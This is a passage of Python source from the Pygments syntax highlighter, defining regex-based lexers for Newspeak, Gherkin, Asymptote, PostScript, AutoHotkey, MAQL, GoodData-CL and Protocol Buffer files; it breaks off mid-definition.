""" name = 'Newspeak' filenames = ['*.ns2'] aliases = ['newspeak', ] mimetypes = ['text/x-newspeak'] tokens = { 'root' : [ (r'\b(Newsqueak2)\b',Keyword.Declaration), (r"'[^']*'",String), (r'\b(class)(\s+)([a-zA-Z0-9_]+)(\s*)', bygroups(Keyword.Declaration,Text,Name.Class,Text)), (r'\b(mixin|self|super|private|public|protected|nil|true|false)\b', Keyword), (r'([a-zA-Z0-9_]+\:)(\s*)([a-zA-Z_]\w+)', bygroups(Name.Function,Text,Name.Variable)), (r'([a-zA-Z0-9_]+)(\s*)(=)', bygroups(Name.Attribute,Text,Operator)), (r'<[a-zA-Z0-9_]+>', Comment.Special), include('expressionstat'), include('whitespace') ], 'expressionstat': [ (r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float), (r'\d+', Number.Integer), (r':\w+',Name.Variable), (r'(\w+)(::)', bygroups(Name.Variable, Operator)), (r'\w+:', Name.Function), (r'\w+', Name.Variable), (r'\(|\)', Punctuation), (r'\[|\]', Punctuation), (r'\{|\}', Punctuation), (r'(\^|\+|\/|~|\*|<|>|=|@|%|\||&|\?|!|,|-|:)', Operator), (r'\.|;', Punctuation), include('whitespace'), include('literals'), ], 'literals': [ (r'\$.', String), (r"'[^']*'", String), (r"#'[^']*'", String.Symbol), (r"#\w+:?", String.Symbol), (r"#(\+|\/|~|\*|<|>|=|@|%|\||&|\?|!|,|-)+", String.Symbol) ], 'whitespace' : [ (r'\s+', Text), (r'"[^"]*"', Comment) ] } class GherkinLexer(RegexLexer): """ For `Gherkin <http://github.com/aslakhellesoy/gherkin/>` syntax. 
    *New in Pygments 1.2.*
    """
    name = 'Gherkin'
    aliases = ['Cucumber', 'cucumber', 'Gherkin', 'gherkin']
    filenames = ['*.feature']
    mimetypes = ['text/x-gherkin']

    # The four keyword categories below are single giant alternations covering
    # every natural-language translation shipped with Gherkin.
    feature_keywords = r'^(기능|機能|功能|フィーチャ|خاصية|תכונה|Функціонал|Функционалност|Функционал|Фича|Особина|Могућност|Özellik|Właściwość|Tính năng|Trajto|Savybė|Požiadavka|Požadavek|Osobina|Ominaisuus|Omadus|OH HAI|Mogućnost|Mogucnost|Jellemző|Fīča|Funzionalità|Funktionalität|Funkcionalnost|Funkcionalitāte|Funcționalitate|Functionaliteit|Functionalitate|Funcionalitat|Funcionalidade|Fonctionnalité|Fitur|Feature|Egenskap|Egenskab|Crikey|Característica|Arwedd)(:)(.*)$'
    feature_element_keywords = r'^(\s*)(시나리오 개요|시나리오|배경|背景|場景大綱|場景|场景大纲|场景|劇本大綱|劇本|テンプレ|シナリオテンプレート|シナリオテンプレ|シナリオアウトライン|シナリオ|سيناريو مخطط|سيناريو|الخلفية|תרחיש|תבנית תרחיש|רקע|Тарих|Сценарій|Сценарио|Сценарий структураси|Сценарий|Структура сценарію|Структура сценарија|Структура сценария|Скица|Рамка на сценарий|Пример|Предыстория|Предистория|Позадина|Передумова|Основа|Концепт|Контекст|Założenia|Wharrimean is|Tình huống|The thing of it is|Tausta|Taust|Tapausaihio|Tapaus|Szenariogrundriss|Szenario|Szablon scenariusza|Stsenaarium|Struktura scenarija|Skica|Skenario konsep|Skenario|Situācija|Senaryo taslağı|Senaryo|Scénář|Scénario|Schema dello scenario|Scenārijs pēc parauga|Scenārijs|Scenár|Scenaro|Scenariusz|Scenariul de şablon|Scenariul de sablon|Scenariu|Scenario Outline|Scenario Amlinellol|Scenario|Scenarijus|Scenarijaus šablonas|Scenarij|Scenarie|Rerefons|Raamstsenaarium|Primer|Pozadí|Pozadina|Pozadie|Plan du scénario|Plan du Scénario|Osnova scénáře|Osnova|Náčrt Scénáře|Náčrt Scenáru|Mate|MISHUN SRSLY|MISHUN|Kịch bản|Konturo de la scenaro|Kontext|Konteksts|Kontekstas|Kontekst|Koncept|Khung tình huống|Khung kịch bản|Háttér|Grundlage|Geçmiş|Forgatókönyv vázlat|Forgatókönyv|Fono|Esquema do Cenário|Esquema do Cenario|Esquema del escenario|Esquema de l\'escenari|Escenario|Escenari|Dis is what went down|Dasar|Contexto|Contexte|Contesto|Condiţii|Conditii|Cenário|Cenario|Cefndir|Bối cảnh|Blokes|Bakgrunn|Bakgrund|Baggrund|Background|B4|Antecedents|Antecedentes|All y\'all|Achtergrond|Abstrakt Scenario|Abstract Scenario)(:)(.*)$'
    examples_keywords = r'^(\s*)(예|例子|例|サンプル|امثلة|דוגמאות|Сценарији|Примери|Приклади|Мисоллар|Значения|Örnekler|Voorbeelden|Variantai|Tapaukset|Scenarios|Scenariji|Scenarijai|Příklady|Példák|Príklady|Przykłady|Primjeri|Primeri|Piemēri|Pavyzdžiai|Paraugs|Juhtumid|Exemplos|Exemples|Exemplele|Exempel|Examples|Esempi|Enghreifftiau|Ekzemploj|Eksempler|Ejemplos|EXAMPLZ|Dữ liệu|Contoh|Cobber|Beispiele)(:)(.*)$'
    step_keywords = r'^(\s*)(하지만|조건|먼저|만일|만약|단|그리고|그러면|那麼|那么|而且|當|当|前提|假設|假如|但是|但し|並且|もし|ならば|ただし|しかし|かつ|و |متى |لكن |عندما |ثم |بفرض |اذاً |כאשר |וגם |בהינתן |אזי |אז |אבל |Якщо |Унда |То |Припустимо, що |Припустимо |Онда |Но |Нехай |Лекин |Когато |Када |Кад |К тому же |И |Задато |Задати |Задате |Если |Допустим |Дадено |Ва |Бирок |Аммо |Али |Але |Агар |А |І |Și |És |Zatati |Zakładając |Zadato |Zadate |Zadano |Zadani |Zadan |Youse know when youse got |Youse know like when |Yna |Ya know how |Ya gotta |Y |Wun |Wtedy |When y\'all |When |Wenn |WEN |Và |Ve |Und |Un |Thì |Then y\'all |Then |Tapi |Tak |Tada |Tad |Så |Stel |Soit |Siis |Si |Sed |Se |Quando |Quand |Quan |Pryd |Pokud |Pokiaľ |Però |Pero |Pak |Oraz |Onda |Ond |Oletetaan |Og |Och |O zaman |Når |När |Niin |Nhưng |N |Mutta |Men |Mas |Maka |Majd |Mais |Maar |Ma |Lorsque |Lorsqu\'|Kun |Kuid |Kui |Khi |Keď |Ketika |Když |Kaj |Kai |Kada |Kad |Jeżeli |Ja |Ir |I CAN HAZ |I |Ha |Givun |Givet |Given y\'all |Given |Gitt |Gegeven |Gegeben sei |Fakat |Eğer ki |Etant donné |Et |Então |Entonces |Entao |En |Eeldades |E |Duota |Dun |Donitaĵo |Donat |Donada |Do |Diyelim ki |Dengan |Den youse gotta |De |Dato |Dar |Dann |Dan |Dado |Dacă |Daca |DEN |Când |Cuando |Cho |Cept |Cand |Cal |But y\'all |But |Buh |Biết |Bet |BUT |Atès |Atunci |Atesa |Anrhegedig a |Angenommen |And y\'all |And |An |Ama |Als |Alors |Allora |Ali |Aleshores |Ale |Akkor |Aber |AN |A také |A |\* )'

    tokens = {
        'comments': [
            (r'#.*$', Comment),
        ],
        'feature_elements': [
            (step_keywords, Keyword, "step_content_stack"),
            include('comments'),
            (r"(\s|.)", Name.Function),
        ],
        'feature_elements_on_stack': [
            (step_keywords, Keyword, "#pop:2"),
            include('comments'),
            (r"(\s|.)", Name.Function),
        ],
        'examples_table': [
            (r"\s+\|", Keyword, 'examples_table_header'),
            include('comments'),
            (r"(\s|.)", Name.Function),
        ],
        'examples_table_header': [
            (r"\s+\|\s*$", Keyword, "#pop:2"),
            include('comments'),
            (r"\s*\|", Keyword),
            (r"[^\|]", Name.Variable),
        ],
        'scenario_sections_on_stack': [
            (feature_element_keywords,
             bygroups(Name.Function, Keyword, Keyword, Name.Function),
             "feature_elements_on_stack"),
        ],
        'narrative': [
            include('scenario_sections_on_stack'),
            (r"(\s|.)", Name.Function),
        ],
        'table_vars': [
            # <placeholder> variables substituted from Examples tables
            (r'(<[^>]+>)', Name.Variable),
        ],
        'numbers': [
            (r'(\d+\.?\d*|\d*\.\d+)([eE][+-]?[0-9]+)?', String),
        ],
        'string': [
            include('table_vars'),
            (r'(\s|.)', String),
        ],
        'py_string': [
            # triple-quoted doc string attached to a step
            (r'"""', Keyword, "#pop"),
            include('string'),
        ],
        'step_content_root': [
            (r"$", Keyword, "#pop"),
            include('step_content'),
        ],
        'step_content_stack': [
            (r"$", Keyword, "#pop:2"),
            include('step_content'),
        ],
        'step_content': [
            (r'"', Name.Function, "double_string"),
            include('table_vars'),
            include('numbers'),
            include('comments'),
            (r'(\s|.)', Name.Function),
        ],
        'table_content': [
            (r"\s+\|\s*$", Keyword, "#pop"),
            include('comments'),
            (r"\s*\|", Keyword),
            include('string'),
        ],
        'double_string': [
            (r'"', Name.Function, "#pop"),
            include('string'),
        ],
        'root': [
            (r'\n', Name.Function),
            include('comments'),
            (r'"""', Keyword, "py_string"),
            (r'\s+\|', Keyword, 'table_content'),
            (r'"', Name.Function, "double_string"),
            include('table_vars'),
            include('numbers'),
            # @tags preceding a feature/scenario
            (r'(\s*)(@[^@\r\n\t ]+)', bygroups(Name.Function, Name.Tag)),
            (step_keywords, bygroups(Name.Function, Keyword),
             'step_content_root'),
            (feature_keywords, bygroups(Keyword, Keyword, Name.Function),
             'narrative'),
(feature_element_keywords, bygroups(Name.Function, Keyword, Keyword, Name.Function), 'feature_elements'), (examples_keywords, bygroups(Name.Function, Keyword, Keyword, Name.Function), 'examples_table'), (r'(\s|.)', Name.Function), ] } class AsymptoteLexer(RegexLexer): """ For `Asymptote <http://asymptote.sf.net/>`_ source code. *New in Pygments 1.2.* """ name = 'Asymptote' aliases = ['asy', 'asymptote'] filenames = ['*.asy'] mimetypes = ['text/x-asymptote'] #: optional Comment or Whitespace _ws = r'(?:\s|//.*?\n|/\*.*?\*/)+' tokens = { 'whitespace': [ (r'\n', Text), (r'\s+', Text), (r'\\\n', Text), # line continuation (r'//(\n|(.|\n)*?[^\\]\n)', Comment), (r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment), ], 'statements': [ # simple string (TeX friendly) (r'"(\\\\|\\"|[^"])*"', String), # C style string (with character escapes) (r"'", String, 'string'), (r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[lL]?', Number.Float), (r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float), (r'0x[0-9a-fA-F]+[Ll]?', Number.Hex), (r'0[0-7]+[Ll]?', Number.Oct), (r'\d+[Ll]?', Number.Integer), (r'[~!%^&*+=|?:<>/-]', Operator), (r'[()\[\],.]', Punctuation), (r'\b(case)(.+?)(:)', bygroups(Keyword, using(this), Text)), (r'(and|controls|tension|atleast|curl|if|else|while|for|do|' r'return|break|continue|struct|typedef|new|access|import|' r'unravel|from|include|quote|static|public|private|restricted|' r'this|explicit|true|false|null|cycle|newframe|operator)\b', Keyword), # Since an asy-type-name can be also an asy-function-name, # in the following we test if the string " [a-zA-Z]" follows # the Keyword.Type. # Of course it is not perfect ! 
(r'(Braid|FitResult|Label|Legend|TreeNode|abscissa|arc|arrowhead|' r'binarytree|binarytreeNode|block|bool|bool3|bounds|bqe|circle|' r'conic|coord|coordsys|cputime|ellipse|file|filltype|frame|grid3|' r'guide|horner|hsv|hyperbola|indexedTransform|int|inversion|key|' r'light|line|linefit|marginT|marker|mass|object|pair|parabola|path|' r'path3|pen|picture|point|position|projection|real|revolution|' r'scaleT|scientific|segment|side|slice|splitface|string|surface|' r'tensionSpecifier|ticklocate|ticksgridT|tickvalues|transform|' r'transformation|tree|triangle|trilinear|triple|vector|' r'vertex|void)(?=([ ]{1,}[a-zA-Z]))', Keyword.Type), # Now the asy-type-name which are not asy-function-name # except yours ! # Perhaps useless (r'(Braid|FitResult|TreeNode|abscissa|arrowhead|block|bool|bool3|' r'bounds|coord|frame|guide|horner|int|linefit|marginT|pair|pen|' r'picture|position|real|revolution|slice|splitface|ticksgridT|' r'tickvalues|tree|triple|vertex|void)\b', Keyword.Type), ('[a-zA-Z_][a-zA-Z0-9_]*:(?!:)', Name.Label), ('[a-zA-Z_][a-zA-Z0-9_]*', Name), ], 'root': [ include('whitespace'), # functions (r'((?:[a-zA-Z0-9_*\s])+?(?:\s|\*))' # return arguments r'([a-zA-Z_][a-zA-Z0-9_]*)' # method name r'(\s*\([^;]*?\))' # signature r'(' + _ws + r')({)', bygroups(using(this), Name.Function, using(this), using(this), Punctuation), 'function'), # function declarations (r'((?:[a-zA-Z0-9_*\s])+?(?:\s|\*))' # return arguments r'([a-zA-Z_][a-zA-Z0-9_]*)' # method name r'(\s*\([^;]*?\))' # signature r'(' + _ws + r')(;)', bygroups(using(this), Name.Function, using(this), using(this), Punctuation)), ('', Text, 'statement'), ], 'statement' : [ include('whitespace'), include('statements'), ('[{}]', Punctuation), (';', Punctuation, '#pop'), ], 'function': [ include('whitespace'), include('statements'), (';', Punctuation), ('{', Punctuation, '#push'), ('}', Punctuation, '#pop'), ], 'string': [ (r"'", String, '#pop'), (r'\\([\\abfnrtv"\'?]|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape), 
(r'\n', String), (r"[^\\'\n]+", String), # all other characters (r'\\\n', String), (r'\\n', String), # line continuation (r'\\', String), # stray backslash ] } def get_tokens_unprocessed(self, text): from pygments.lexers._asybuiltins import ASYFUNCNAME, ASYVARNAME for index, token, value in \ RegexLexer.get_tokens_unprocessed(self, text): if token is Name and value in ASYFUNCNAME: token = Name.Function elif token is Name and value in ASYVARNAME: token = Name.Variable yield index, token, value class PostScriptLexer(RegexLexer): """ Lexer for PostScript files. The PostScript Language Reference published by Adobe at <http://partners.adobe.com/public/developer/en/ps/PLRM.pdf> is the authority for this. *New in Pygments 1.4.* """ name = 'PostScript' aliases = ['postscript', 'postscr'] filenames = ['*.ps', '*.eps'] mimetypes = ['application/postscript'] delimiter = r'\(\)\<\>\[\]\{\}\/\%\s' delimiter_end = r'(?=[%s])' % delimiter valid_name_chars = r'[^%s]' % delimiter valid_name = r"%s+%s" % (valid_name_chars, delimiter_end) tokens = { 'root': [ # All comment types (r'^%!.+\n', Comment.Preproc), (r'%%.*\n', Comment.Special), (r'(^%.*\n){2,}', Comment.Multiline), (r'%.*\n', Comment.Single), # String literals are awkward; enter separate state. (r'\(', String, 'stringliteral'), (r'[\{\}(\<\<)(\>\>)\[\]]', Punctuation), # Numbers (r'<[0-9A-Fa-f]+>' + delimiter_end, Number.Hex), # Slight abuse: use Oct to signify any explicit base system (r'[0-9]+\#(\-|\+)?([0-9]+\.?|[0-9]*\.[0-9]+|[0-9]+\.[0-9]*)' r'((e|E)[0-9]+)?' + delimiter_end, Number.Oct), (r'(\-|\+)?([0-9]+\.?|[0-9]*\.[0-9]+|[0-9]+\.[0-9]*)((e|E)[0-9]+)?' 
+ delimiter_end, Number.Float), (r'(\-|\+)?[0-9]+' + delimiter_end, Number.Integer), # References (r'\/%s' % valid_name, Name.Variable), # Names (valid_name, Name.Function), # Anything else is executed # These keywords taken from # <http://www.math.ubc.ca/~cass/graphics/manual/pdf/a1.pdf> # Is there an authoritative list anywhere that doesn't involve # trawling documentation? (r'(false|true)' + delimiter_end, Keyword.Constant), # Conditionals / flow control (r'(eq|ne|ge|gt|le|lt|and|or|not|if|ifelse|for|forall)' + delimiter_end, Keyword.Reserved), ('(abs|add|aload|arc|arcn|array|atan|begin|bind|ceiling|charpath|' 'clip|closepath|concat|concatmatrix|copy|cos|currentlinewidth|' 'currentmatrix|currentpoint|curveto|cvi|cvs|def|defaultmatrix|' 'dict|dictstackoverflow|div|dtransform|dup|end|exch|exec|exit|exp|' 'fill|findfont|floor|get|getinterval|grestore|gsave|gt|' 'identmatrix|idiv|idtransform|index|invertmatrix|itransform|' 'length|lineto|ln|load|log|loop|matrix|mod|moveto|mul|neg|newpath|' 'pathforall|pathbbox|pop|print|pstack|put|quit|rand|rangecheck|' 'rcurveto|repeat|restore|rlineto|rmoveto|roll|rotate|round|run|' 'save|scale|scalefont|setdash|setfont|setgray|setlinecap|' 'setlinejoin|setlinewidth|setmatrix|setrgbcolor|shfill|show|' 'showpage|sin|sqrt|stack|stringwidth|stroke|strokepath|sub|' 'syntaxerror|transform|translate|truncate|typecheck|undefined|' 'undefinedfilename|undefinedresult)' + delimiter_end, Name.Builtin), (r'\s+', Text), ], 'stringliteral': [ (r'[^\(\)\\]+', String), (r'\\', String.Escape, 'escape'), (r'\(', String, '#push'), (r'\)', String, '#pop'), ], 'escape': [ (r'([0-8]{3}|n|r|t|b|f|\\|\(|\))?', String.Escape, '#pop'), ], } class AutohotkeyLexer(RegexLexer): """ For `autohotkey <http://www.autohotkey.com/>`_ source code. 
*New in Pygments 1.4.* """ name = 'autohotkey' aliases = ['ahk', 'autohotkey'] filenames = ['*.ahk', '*.ahkl'] mimetypes = ['text/x-autohotkey'] tokens = { 'root': [ (r'^(\s*)(/\*)', bygroups(Text, Comment.Multiline), 'incomment'), (r'^(\s*)(\()', bygroups(Text, Generic), 'incontinuation'), (r'\s+;.*?$', Comment.Singleline), (r'^;.*?$', Comment.Singleline), (r'[]{}(),;[]', Punctuation), (r'(in|is|and|or|not)\b', Operator.Word), (r'\%[a-zA-Z_#@$][a-zA-Z0-9_#@$]*\%', Name.Variable), (r'!=|==|:=|\.=|<<|>>|[-~+/*%=<>&^|?:!.]', Operator), include('commands'), include('labels'), include('builtInFunctions'), include('builtInVariables'), (r'"', String, combined('stringescape', 'dqs')), include('numbers'), (r'[a-zA-Z_#@$][a-zA-Z0-9_#@$]*', Name), (r'\\|\'', Text), (r'\`([\,\%\`abfnrtv\-\+;])', String.Escape), include('garbage'), ], 'incomment': [ (r'^\s*\*/', Comment.Multiline, '#pop'), (r'[^*/]', Comment.Multiline), (r'[*/]', Comment.Multiline) ], 'incontinuation': [ (r'^\s*\)', Generic, '#pop'), (r'[^)]', Generic), (r'[)]', Generic), ], 'commands': [ (r'(?i)^(\s*)(global|local|static|' r'#AllowSameLineComments|#ClipboardTimeout|#CommentFlag|' r'#ErrorStdOut|#EscapeChar|#HotkeyInterval|#HotkeyModifierTimeout|' r'#Hotstring|#IfWinActive|#IfWinExist|#IfWinNotActive|' r'#IfWinNotExist|#IncludeAgain|#Include|#InstallKeybdHook|' r'#InstallMouseHook|#KeyHistory|#LTrim|#MaxHotkeysPerInterval|' r'#MaxMem|#MaxThreads|#MaxThreadsBuffer|#MaxThreadsPerHotkey|' r'#NoEnv|#NoTrayIcon|#Persistent|#SingleInstance|#UseHook|' r'#WinActivateForce|AutoTrim|BlockInput|Break|Click|ClipWait|' r'Continue|Control|ControlClick|ControlFocus|ControlGetFocus|' r'ControlGetPos|ControlGetText|ControlGet|ControlMove|ControlSend|' r'ControlSendRaw|ControlSetText|CoordMode|Critical|' r'DetectHiddenText|DetectHiddenWindows|Drive|DriveGet|' r'DriveSpaceFree|Edit|Else|EnvAdd|EnvDiv|EnvGet|EnvMult|EnvSet|' r'EnvSub|EnvUpdate|Exit|ExitApp|FileAppend|' r'FileCopy|FileCopyDir|FileCreateDir|FileCreateShortcut|' 
r'FileDelete|FileGetAttrib|FileGetShortcut|FileGetSize|' r'FileGetTime|FileGetVersion|FileInstall|FileMove|FileMoveDir|' r'FileRead|FileReadLine|FileRecycle|FileRecycleEmpty|' r'FileRemoveDir|FileSelectFile|FileSelectFolder|FileSetAttrib|' r'FileSetTime|FormatTime|GetKeyState|Gosub|Goto|GroupActivate|' r'GroupAdd|GroupClose|GroupDeactivate|Gui|GuiControl|' r'GuiControlGet|Hotkey|IfEqual|IfExist|IfGreaterOrEqual|IfGreater|' r'IfInString|IfLess|IfLessOrEqual|IfMsgBox|IfNotEqual|IfNotExist|' r'IfNotInString|IfWinActive|IfWinExist|IfWinNotActive|' r'IfWinNotExist|If |ImageSearch|IniDelete|IniRead|IniWrite|' r'InputBox|Input|KeyHistory|KeyWait|ListHotkeys|ListLines|' r'ListVars|Loop|Menu|MouseClickDrag|MouseClick|MouseGetPos|' r'MouseMove|MsgBox|OnExit|OutputDebug|Pause|PixelGetColor|' r'PixelSearch|PostMessage|Process|Progress|Random|RegDelete|' r'RegRead|RegWrite|Reload|Repeat|Return|RunAs|RunWait|Run|' r'SendEvent|SendInput|SendMessage|SendMode|SendPlay|SendRaw|Send|' r'SetBatchLines|SetCapslockState|SetControlDelay|' r'SetDefaultMouseSpeed|SetEnv|SetFormat|SetKeyDelay|' r'SetMouseDelay|SetNumlockState|SetScrollLockState|' r'SetStoreCapslockMode|SetTimer|SetTitleMatchMode|' r'SetWinDelay|SetWorkingDir|Shutdown|Sleep|Sort|SoundBeep|' r'SoundGet|SoundGetWaveVolume|SoundPlay|SoundSet|' r'SoundSetWaveVolume|SplashImage|SplashTextOff|SplashTextOn|' r'SplitPath|StatusBarGetText|StatusBarWait|StringCaseSense|' r'StringGetPos|StringLeft|StringLen|StringLower|StringMid|' r'StringReplace|StringRight|StringSplit|StringTrimLeft|' r'StringTrimRight|StringUpper|Suspend|SysGet|Thread|ToolTip|' r'Transform|TrayTip|URLDownloadToFile|While|WinActivate|' r'WinActivateBottom|WinClose|WinGetActiveStats|WinGetActiveTitle|' r'WinGetClass|WinGetPos|WinGetText|WinGetTitle|WinGet|WinHide|' r'WinKill|WinMaximize|WinMenuSelectItem|WinMinimizeAllUndo|' r'WinMinimizeAll|WinMinimize|WinMove|WinRestore|WinSetTitle|' r'WinSet|WinShow|WinWaitActive|WinWaitClose|WinWaitNotActive|' r'WinWait)\b', 
bygroups(Text, Name.Builtin)), ], 'builtInFunctions': [ (r'(?i)(Abs|ACos|Asc|ASin|ATan|Ceil|Chr|Cos|DllCall|Exp|FileExist|' r'Floor|GetKeyState|IL_Add|IL_Create|IL_Destroy|InStr|IsFunc|' r'IsLabel|Ln|Log|LV_Add|LV_Delete|LV_DeleteCol|LV_GetCount|' r'LV_GetNext|LV_GetText|LV_Insert|LV_InsertCol|LV_Modify|' r'LV_ModifyCol|LV_SetImageList|Mod|NumGet|NumPut|OnMessage|' r'RegExMatch|RegExReplace|RegisterCallback|Round|SB_SetIcon|' r'SB_SetParts|SB_SetText|Sin|Sqrt|StrLen|SubStr|Tan|TV_Add|' r'TV_Delete|TV_GetChild|TV_GetCount|TV_GetNext|TV_Get|' r'TV_GetParent|TV_GetPrev|TV_GetSelection|TV_GetText|TV_Modify|' r'VarSetCapacity|WinActive|WinExist|Object|ComObjActive|' r'ComObjArray|ComObjEnwrap|ComObjUnwrap|ComObjParameter|' r'ComObjType|ComObjConnect|ComObjCreate|ComObjGet|ComObjError|' r'ComObjValue|Insert|MinIndex|MaxIndex|Remove|SetCapacity|' r'GetCapacity|GetAddress|_NewEnum|FileOpen|Read|Write|ReadLine|' r'WriteLine|ReadNumType|WriteNumType|RawRead|RawWrite|Seek|Tell|' r'Close|Next|IsObject|StrPut|StrGet|Trim|LTrim|RTrim)\b', Name.Function), ], 'builtInVariables': [ (r'(?i)(A_AhkPath|A_AhkVersion|A_AppData|A_AppDataCommon|' r'A_AutoTrim|A_BatchLines|A_CaretX|A_CaretY|A_ComputerName|' r'A_ControlDelay|A_Cursor|A_DDDD|A_DDD|A_DD|A_DefaultMouseSpeed|' r'A_Desktop|A_DesktopCommon|A_DetectHiddenText|' r'A_DetectHiddenWindows|A_EndChar|A_EventInfo|A_ExitReason|' r'A_FormatFloat|A_FormatInteger|A_Gui|A_GuiEvent|A_GuiControl|' r'A_GuiControlEvent|A_GuiHeight|A_GuiWidth|A_GuiX|A_GuiY|A_Hour|' r'A_IconFile|A_IconHidden|A_IconNumber|A_IconTip|A_Index|' r'A_IPAddress1|A_IPAddress2|A_IPAddress3|A_IPAddress4|A_ISAdmin|' r'A_IsCompiled|A_IsCritical|A_IsPaused|A_IsSuspended|A_KeyDelay|' r'A_Language|A_LastError|A_LineFile|A_LineNumber|A_LoopField|' r'A_LoopFileAttrib|A_LoopFileDir|A_LoopFileExt|A_LoopFileFullPath|' r'A_LoopFileLongPath|A_LoopFileName|A_LoopFileShortName|' r'A_LoopFileShortPath|A_LoopFileSize|A_LoopFileSizeKB|' 
r'A_LoopFileSizeMB|A_LoopFileTimeAccessed|A_LoopFileTimeCreated|' r'A_LoopFileTimeModified|A_LoopReadLine|A_LoopRegKey|' r'A_LoopRegName|A_LoopRegSubkey|A_LoopRegTimeModified|' r'A_LoopRegType|A_MDAY|A_Min|A_MM|A_MMM|A_MMMM|A_Mon|A_MouseDelay|' r'A_MSec|A_MyDocuments|A_Now|A_NowUTC|A_NumBatchLines|A_OSType|' r'A_OSVersion|A_PriorHotkey|A_ProgramFiles|A_Programs|' r'A_ProgramsCommon|A_ScreenHeight|A_ScreenWidth|A_ScriptDir|' r'A_ScriptFullPath|A_ScriptName|A_Sec|A_Space|A_StartMenu|' r'A_StartMenuCommon|A_Startup|A_StartupCommon|A_StringCaseSense|' r'A_Tab|A_Temp|A_ThisFunc|A_ThisHotkey|A_ThisLabel|A_ThisMenu|' r'A_ThisMenuItem|A_ThisMenuItemPos|A_TickCount|A_TimeIdle|' r'A_TimeIdlePhysical|A_TimeSincePriorHotkey|A_TimeSinceThisHotkey|' r'A_TitleMatchMode|A_TitleMatchModeSpeed|A_UserName|A_WDay|' r'A_WinDelay|A_WinDir|A_WorkingDir|A_YDay|A_YEAR|A_YWeek|A_YYYY|' r'Clipboard|ClipboardAll|ComSpec|ErrorLevel|ProgramFiles|True|' r'False|A_IsUnicode|A_FileEncoding|A_OSVersion|A_PtrSize)\b', Name.Variable), ], 'labels': [ # hotkeys and labels # technically, hotkey names are limited to named keys and buttons (r'(^\s*)([^:\s\(\"]+?:{1,2})', bygroups(Text, Name.Label)), (r'(^\s*)(::[^:\s]+?::)', bygroups(Text, Name.Label)), ], 'numbers': [ (r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?', Number.Float), (r'\d+[eE][+-]?[0-9]+', Number.Float), (r'0\d+', Number.Oct), (r'0[xX][a-fA-F0-9]+', Number.Hex), (r'\d+L', Number.Integer.Long), (r'\d+', Number.Integer) ], 'stringescape': [ (r'\"\"|\`([\,\%\`abfnrtv])', String.Escape), ], 'strings': [ (r'[^"\n]+', String), ], 'dqs': [ (r'"', String, '#pop'), include('strings') ], 'garbage': [ (r'[^\S\n]', Text), # (r'.', Text), # no cheating ], } class MaqlLexer(RegexLexer): """ Lexer for `GoodData MAQL <https://secure.gooddata.com/docs/html/advanced.metric.tutorial.html>`_ scripts. 
*New in Pygments 1.4.* """ name = 'MAQL' aliases = ['maql'] filenames = ['*.maql'] mimetypes = ['text/x-gooddata-maql','application/x-gooddata-maql'] flags = re.IGNORECASE tokens = { 'root': [ # IDENTITY (r'IDENTIFIER\b', Name.Builtin), # IDENTIFIER (r'\{[^}]+\}', Name.Variable), # NUMBER (r'[0-9]+(?:\.[0-9]+)?(?:[eE][+-]?[0-9]{1,3})?', Literal.Number), # STRING (r'"', Literal.String, 'string-literal'), # RELATION (r'\<\>|\!\=', Operator), (r'\=|\>\=|\>|\<\=|\<', Operator), # := (r'\:\=', Operator), # OBJECT (r'\[[^]]+\]', Name.Variable.Class), # keywords (r'(DIMENSIONS?|BOTTOM|METRIC|COUNT|OTHER|FACT|WITH|TOP|OR|' r'ATTRIBUTE|CREATE|PARENT|FALSE|ROWS?|FROM|ALL|AS|PF|' r'COLUMNS?|DEFINE|REPORT|LIMIT|TABLE|LIKE|AND|BY|' r'BETWEEN|EXCEPT|SELECT|MATCH|WHERE|TRUE|FOR|IN|' r'WITHOUT|FILTER|ALIAS|ORDER|FACT|WHEN|NOT|ON|' r'KEYS|KEY|FULLSET|PRIMARY|LABELS|LABEL|VISUAL|' r'TITLE|DESCRIPTION|FOLDER|ALTER|DROP|ADD|DATASET|' r'DATATYPE|INT|BIGINT|DOUBLE|DATE|VARCHAR|DECIMAL|' r'SYNCHRONIZE|TYPE|DEFAULT|ORDER|ASC|DESC|HYPERLINK|' r'INCLUDE|TEMPLATE|MODIFY)\b', Keyword), # FUNCNAME (r'[a-zA-Z]\w*\b', Name.Function), # Comments (r'#.*', Comment.Single), # Punctuation (r'[,;\(\)]', Token.Punctuation), # Space is not significant (r'\s+', Text) ], 'string-literal': [ (r'\\[tnrfbae"\\]', String.Escape), (r'"', Literal.String, '#pop'), (r'[^\\"]+', Literal.String) ], } class GoodDataCLLexer(RegexLexer): """ Lexer for `GoodData-CL <http://github.com/gooddata/GoodData-CL/raw/master/cli/src/main/resources/com/gooddata/processor/COMMANDS.txt>`_ script files. 
*New in Pygments 1.4.* """ name = 'GoodData-CL' aliases = ['gooddata-cl'] filenames = ['*.gdc'] mimetypes = ['text/x-gooddata-cl'] flags = re.IGNORECASE tokens = { 'root': [ # Comments (r'#.*', Comment.Single), # Function call (r'[a-zA-Z]\w*', Name.Function), # Argument list (r'\(', Token.Punctuation, 'args-list'), # Punctuation (r';', Token.Punctuation), # Space is not significant (r'\s+', Text) ], 'args-list': [ (r'\)', Token.Punctuation, '#pop'), (r',', Token.Punctuation), (r'[a-zA-Z]\w*', Name.Variable), (r'=', Operator), (r'"', Literal.String, 'string-literal'), (r'[0-9]+(?:\.[0-9]+)?(?:[eE][+-]?[0-9]{1,3})?', Literal.Number), # Space is not significant (r'\s', Text) ], 'string-literal': [ (r'\\[tnrfbae"\\]', String.Escape), (r'"', Literal.String, '#pop'), (r'[^\\"]+', Literal.String) ] } class ProtoBufLexer(RegexLexer): """ Lexer for `Protocol Buffer <http://code.google.com/p/protobuf/>`_ definition files. *New in Pygments 1.4.* """ name = 'Protocol Buffer' aliases = ['protobuf', 'proto'] filenames = ['*.proto'] tokens = { 'root': [ (r'[ \t]+', Text), (r'[,;{}\[\]\(\)]', Punctuation), (r'/(\\\n)?/(\n|(.|\n)*?[^\\]\n)', Comment.Single), (r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment.Multiline), (r'\b(import|option|optional|required|repeated|default|packed|' r'ctype|extensions|to|max|rpc|returns)\b', Keyword), (r'(int32|int64|uint32|uint64|sint32|sint64|' 